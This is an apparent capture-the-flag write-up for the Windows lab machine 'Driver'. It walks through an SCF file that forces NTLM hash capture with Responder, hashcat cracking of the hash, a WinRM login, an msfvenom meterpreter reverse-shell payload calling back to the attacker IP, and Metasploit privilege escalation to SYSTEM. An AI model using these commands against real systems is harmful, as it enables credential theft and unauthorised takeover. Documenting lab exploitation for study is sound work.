Summary
This quite an interesting easy box, or at least the foothold step is. It starts out with using an scf file to force the target system to connect to the attacker system when opened. The attacker system usse responder to steal the NTLM hash of the user trying to connect. From there however it quite straight forward to get root access on the system meterpreter.
Foothold
Let’s start out by doing a port scan with nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 11:35 EDT
Nmap scan report for 10.129.238.26
Host is up (0.027s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-13T22:35:39
|_ start_date: 2021-10-13T22:32:37
The port scan shows that it is a Windows machine, hosting a web application on port 80, as well as SMB on port 445 and RPC on port 135.
Visiting the web application we get greeted with a password prompt. Since this is an easy box, we should try default credentials. The credentials admin:admin allows us to login to the site. 
The only tab we can naigate to is the “upload firmware” tab. 
As can be seen, it is mentioned that the uploaded software will be manually reviewed. I found the following blogpost which describes how a writeable SMB share can be leveraged into hosting an scf file, which when viewed will execute some limited commands. This can be used to force the target system into requesting a resource from our machine, and we can then use responder to capture the hashes of the users trying to access the resource. We first setuo responder:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(bitis㉿workstation)-[~/htb/Machines/Driver]
└─$ sudo responder -w -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
We then use the upload functionality on the website to upload a scf file with the following content:
1
2
3
4
5
[Shell]
Command=2
IconFile=\\10.10.17.182\share\based.ico
[Taskbar]
Command=ToggleDesktop
We then capture the hash of the tony user: 
The captured hash is an NTLMv2 hash, and can be cracked with hashcat.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
TONY::DRIVER:606023421617185a:f529bb0dd367ca7ceaf6760da48aa0d8:010100000000000080cdf4d4ce85d801dc17fcdffe34b71600000000020008005a0051003700570001001e00570049004e002d00590055004a0035004d0055005a0033004d004900520004003400570049004e002d00590055004a0035004d0055005a0033004d00490052002e005a005100370057002e004c004f00430041004c00030014005a005100370057002e004c004f00430041004c00050014005a005100370057002e004c004f00430041004c000700080080cdf4d4ce85d801060004000200000008003000300000000000000000000000002000008b1385354cfd60740b8c7ad96bd4c4f7f1fb0ff6e3f04d534f4f279ca063a6670a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310037002e00310038003200000000000000000000000000:liltony
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TONY::DRIVER:606023421617185a:f529bb0dd367ca7ceaf67...000000
Time.Started.....: Wed Jun 22 00:33:06 2022 (0 secs)
Time.Estimated...: Wed Jun 22 00:33:06 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1188.6 kH/s (2.02ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32768/14344385 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 28672/14344385 (0.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: softball27 -> eatme1
Hardware.Mon.#1..: Temp: 59c Util: 13%
We now have the credentials tony:liltony. We can then proceed to login as the tony user via evil-winrm:
1
2
3
4
5
6
7
8
9
10
11
12
┌──(bitis㉿workstation)-[~/htb/Machines/Driver]
└─$ evil-winrm -i 10.129.84.206 -u tony -p liltony
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
Privilege escalation
As we saw in the Devel box, a meterpreter session on a Windows system can be very helpful when it comes to exploiting the system. We’ll prepare a meterpreter revershell via msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.182 LPORT=1337 -f exe > evil.exe We will then upload the payload generated by msfvenom via evil-winrm:
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\tony\Documents> upload evil.exe
Info: Uploading evil.exe to C:\Users\tony\Documents\evil.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
We then setup a meterpreter listener in metasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(bitis㉿workstation)-[~/htb/Machines/Driver]
└─$ sudo msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.182:1337
[*] Sending stage (175686 bytes) to 10.129.84.206
[*] Meterpreter session 1 opened (10.10.17.182:1337 -> 10.129.84.206:49429) at 2022-06-22 00:45:52 +0200
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.84.206 - Collecting local exploits for x86/windows...
[*] 10.129.84.206 - 167 exploit checks are being tried...
[+] 10.129.84.206 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.84.206 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.129.84.206 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.84.206 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.84.206 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.129.84.206 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[+] 10.129.84.206 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.84.206 - Valid modules for session 1:
Based on the sysinfo command we can tell the system is running on x64 architecture.
1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer : DRIVER
OS : Windows 10 (10.0 Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
We can use the ricoh exploit to get root access:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.17.182:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer wnahEkzl...
[*] Sending stage (200774 bytes) to 10.129.84.206
[*] Meterpreter session 4 opened (10.10.17.182:4444 -> 10.129.84.206:49432) at 2022-06-22 01:09:43 +0200
[*] Meterpreter session 5 opened (10.10.17.182:4444 -> 10.129.84.206:49433) at 2022-06-22 01:13:47 +0200
[*] Deleting printer wnahEkzl
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Rooted!